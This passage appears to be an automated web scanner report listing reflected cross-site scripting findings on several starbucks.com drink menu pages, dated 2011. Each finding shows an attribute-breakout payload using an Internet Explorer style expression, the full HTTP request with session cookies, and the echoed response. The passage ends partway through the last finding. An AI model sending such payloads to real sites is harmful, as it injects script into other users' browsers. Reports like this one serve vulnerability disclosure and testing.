Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e53d6"style="x:expression(alert(1))"103b6e338a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/chocolate/hot-chocolate?e53d6"style%3d"x%3aexpression(alert(1))"103b6e338a0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:52 GMT
Connection: close
Content-Length: 41071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate?e53d6"style="x:expression(alert(1))"103b6e338a0=1"/>
...[SNIP]...

1.714. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/peppermint-mocha-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 601a4"style="x:expression(alert(1))"868c1ee823c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style%3d"x%3aexpression(alert(1))"868c1ee823c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate?601a4"style="x:expression(alert(1))"868c1ee823c=1"/>
...[SNIP]...

1.715. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/salted-caramel-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d695f"style="x:expression(alert(1))"8d2325f8a6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style%3d"x%3aexpression(alert(1))"8d2325f8a6d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:48 GMT
Connection: close
Content-Length: 41575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate?d695f"style="x:expression(alert(1))"8d2325f8a6d=1"/>
...[SNIP]...

1.716. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/chocolate/white-hot-chocolate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5391b"style="x:expression(alert(1))"a19b060ce42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/chocolate/white-hot-chocolate?5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:26 GMT
Connection: close
Content-Length: 41166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate?5391b"style="x:expression(alert(1))"a19b060ce42=1"/>
...[SNIP]...

1.717. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-americano

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f255"style="x:expression(alert(1))"4510f38bf85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/espresso/caffe-americano?6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:09 GMT
Connection: close
Content-Length: 42932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-americano?6f255"style="x:expression(alert(1))"4510f38bf85=1"/>
...[SNIP]...

1.718. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b40a7"style="x:expression(alert(1))"30887b94fb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caffe-latte?b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:55 GMT
Connection: close
Content-Length: 42713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-latte?b40a7"style="x:expression(alert(1))"30887b94fb0=1"/>
...[SNIP]...

1.719. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caffe-mocha

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45914"style%3d"x%3aexpression(alert(1))"d584cd48a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45914"style="x:expression(alert(1))"d584cd48a51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caffe-mocha?45914"style%3d"x%3aexpression(alert(1))"d584cd48a51=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:23:49 GMT
Connection: close
Content-Length: 43114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-mocha?45914"style="x:expression(alert(1))"d584cd48a51=1"/>
...[SNIP]...

1.720. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e145"style="x:expression(alert(1))"9afccd69e4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/cappuccino?7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:17 GMT
Connection: close
Content-Length: 42857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cappuccino?7e145"style="x:expression(alert(1))"9afccd69e4b=1"/>
...[SNIP]...

1.721. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-brulee-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fbaa"style="x:expression(alert(1))"edc31d198d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caramel-brulee-latte?9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:24:22 GMT
Connection: close
Content-Length: 43406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte?9fbaa"style="x:expression(alert(1))"edc31d198d3=1"/>
...[SNIP]...

1.722. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/caramel-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46c9c"style="x:expression(alert(1))"2b341b0daca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/caramel-macchiato?46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:08 GMT
Connection: close
Content-Length: 43191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato?46c9c"style="x:expression(alert(1))"2b341b0daca=1"/>
...[SNIP]...

1.723. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/cinnamon-dolce-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f06"style%3d"x%3aexpression(alert(1))"edbeba63995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20f06"style="x:expression(alert(1))"edbeba63995 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/cinnamon-dolce-latte?20f06"style%3d"x%3aexpression(alert(1))"edbeba63995=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:18 GMT
Connection: close
Content-Length: 43087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte?20f06"style="x:expression(alert(1))"edbeba63995=1"/>
...[SNIP]...

1.724. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/eggnog-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fbe1"style="x:expression(alert(1))"947cd8ab9f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/eggnog-latte?5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:06 GMT
Connection: close
Content-Length: 43144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/eggnog-latte?5fbe1"style="x:expression(alert(1))"947cd8ab9f7=1"/>
...[SNIP]...

1.725. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-con-panna

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 308a1"style="x:expression(alert(1))"67cfbbd6d45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-con-panna?308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:10 GMT
Connection: close
Content-Length: 42380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna?308a1"style="x:expression(alert(1))"67cfbbd6d45=1"/>
...[SNIP]...

1.726. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-macchiato

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fec3e"style="x:expression(alert(1))"7a8ae9aecf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/espresso/espresso-macchiato?fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:25:13 GMT
Connection: close
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato?fec3e"style="x:expression(alert(1))"7a8ae9aecf=1"/>
...[SNIP]...

1.727. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/espresso/espresso-shot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1525"style="x:expression(alert(1))"c72de6024ef in the application's response.

